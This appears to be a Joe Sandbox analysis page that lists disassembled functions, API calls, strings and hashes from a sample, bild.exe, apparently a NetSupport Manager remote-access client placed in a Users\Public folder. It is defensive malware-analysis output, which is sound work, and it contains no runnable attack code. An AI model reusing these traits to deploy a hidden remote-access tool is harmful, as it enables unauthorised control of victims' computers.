Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: ..\ctl32\Refcount.cpp$hThread
API String ID: 3360349984-1136101629
Opcode ID: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
Instruction ID: 7cf91fcea6c2a3c5c2684f5d08a561b662f4dc7f01f0c277a0d6c7245401f800
Opcode Fuzzy Hash: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
Instruction Fuzzy Hash: E7015E7A7443166FE3209EA9CC86F57FBA8DB44764F104128FA25962C4DA60F805CB64

Function 11031960 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110319A7

Strings

506407, xrefs: 1103198E
_SW, xrefs: 1103197C
_HF, xrefs: 11031988, 1103198D
%s%s%s.bin, xrefs: 110319A1
_HW, xrefs: 11031970

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s%s%s.bin$506407$_HF$_HW$_SW
API String ID: 2111968516-529817155
Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6

Function 11102AB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11102B03
GetStockObject.GDI32(00000004), ref: 11102B5B
RegisterClassA.USER32(?), ref: 11102B6F
CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 11102BAC

Strings

NSMDesktopWnd, xrefs: 11102AE9, 11102B68, 11102BA6

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: AtomClassCreateGlobalObjectRegisterStockWindow
String ID: NSMDesktopWnd
API String ID: 2669163067-206650970
Opcode ID: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
Instruction ID: 4c07b853b75387a4d851a66abc04609236edd6d81c14be1d28904dd9f6a0e6ac
Opcode Fuzzy Hash: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
Instruction Fuzzy Hash: C231F4B0D15619AFDB44CFA9D980A9EFBF4FB08314F50962EE46AE3640E7346900CF94

Function 1113CC30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113CC9A
KillTimer.USER32(00000000,00007F70,TermUI...), ref: 1113CCB3
FreeLibrary.KERNEL32(76A50000,?,TermUI...), ref: 1113CD2B
FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113CD43

Strings

TermUI, xrefs: 1113CC32

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: FreeKillLibraryTimer
String ID: TermUI
API String ID: 2006562601-4085834059
Opcode ID: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
Instruction ID: 1c615ec055e307fcecd6c2f5a0081f3099d40e524c959ad3afbad8c7da76a6da
Opcode Fuzzy Hash: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
Instruction Fuzzy Hash: 813182B46121329FE605DF9ACDE496EFB6ABBC4B1C750402BF4689720CE770A845CF91

Function 11145330 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
RegCloseKey.ADVAPI32(?), ref: 11145404

Strings

SOFTWARE\NetSupport Ltd\PCICTL, xrefs: 11145380
ForceRTL, xrefs: 111453C3
SOFTWARE\Productive Computer Insight\PCICTL, xrefs: 11145367, 1114539E

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
API String ID: 47109696-3245241687
Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0

Function 111114D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9

GetComputerNameA.KERNEL32(?,?), ref: 11111578

Strings

\Registry\Machine\SOFTWARE\Classes\N%x, xrefs: 11111520
\Registry\Machine\SOFTWARE\Classes\N%x.%s, xrefs: 11111587
ACM, xrefs: 11111532
, xrefs: 11111571

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
API String ID: 806825551-1858614750
Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391

Function 11144200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\bild.exe,00000104,?,11143E73,?), ref: 11143C49

WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
ResetEvent.KERNEL32(00000260), ref: 11144269
SetEvent.KERNEL32(00000260), ref: 1114427F
WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E

Strings

MiniDump, xrefs: 11144207

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
String ID: MiniDump
API String ID: 1494854734-2840755058
Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1

Function 6C5D8E28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 6C5D5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C5D5014
Part of subcall function 6C5D5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D5034

CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C5D8EAE
FreeLibrary.KERNEL32(?), ref: 6C5D8EBF

Part of subcall function 6C5D2420: _strrchr.LIBCMT ref: 6C5D242E

Strings

Set Is247=%d, xrefs: 6C5D8ED7
NSM247Ctl.dll, xrefs: 6C5D8E7E
pcictl_247.dll, xrefs: 6C5D8E6C

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
API String ID: 3215810784-3459472706
Opcode ID: 3ee5d9b70c8375cfaad0b33beadb582dc74712d6f31e78f945432fbef0c93e6f
Instruction ID: 4573ae2351151d015c2c357bba2021c5f544f90380badc6162b9e0d8fb36d264
Opcode Fuzzy Hash: 3ee5d9b70c8375cfaad0b33beadb582dc74712d6f31e78f945432fbef0c93e6f
Instruction Fuzzy Hash: 6111E471A04316DFDF109B599C41BEA7374EB45306F010466DE19E7A40EB70BE48CFAA

Function 11146DA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11146DCF
wsprintfA.USER32 ref: 11146E06

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

#%d, xrefs: 11146E00
i < _tsizeof (buf), xrefs: 11146E20
..\ctl32\util.cpp, xrefs: 11146E1B

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastLoadMessageProcessString
String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
API String ID: 1985783259-2296142801
Opcode ID: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
Instruction ID: b1a6c5171231f01418375ac6f2de6c12625a8d09d3611db16d7d0d369645f93a
Opcode Fuzzy Hash: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
Instruction Fuzzy Hash: FA11A5FAE00128ABC720DB65ED81FAAF77C9B4461DF000565EB19B6141EA35AA05C7A8

Function 1110F420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1110F439

Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96

wsprintfA.USER32 ref: 1110F454

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

_memset.LIBCMT ref: 1110F477

Strings

Can't alloc %u bytes, xrefs: 1110F44E
..\ctl32\Refcount.cpp, xrefs: 1110F465

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
API String ID: 3234921582-2664294811
Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9

Function 11145AE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75A78400), ref: 111450D0
Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA

LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24

Strings

shcore.dll, xrefs: 11145AFA
SetProcessDpiAwareness, xrefs: 11145B0B

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
String ID: SetProcessDpiAwareness$shcore.dll
API String ID: 1108920153-1959555903
Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5

Function 11031870 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11031926

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

clientinv.cpp, xrefs: 1103189E
506407, xrefs: 11031907
%s%s.bin, xrefs: 11031920
m_pDoInv == NULL, xrefs: 110318A3

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastMessageProcess
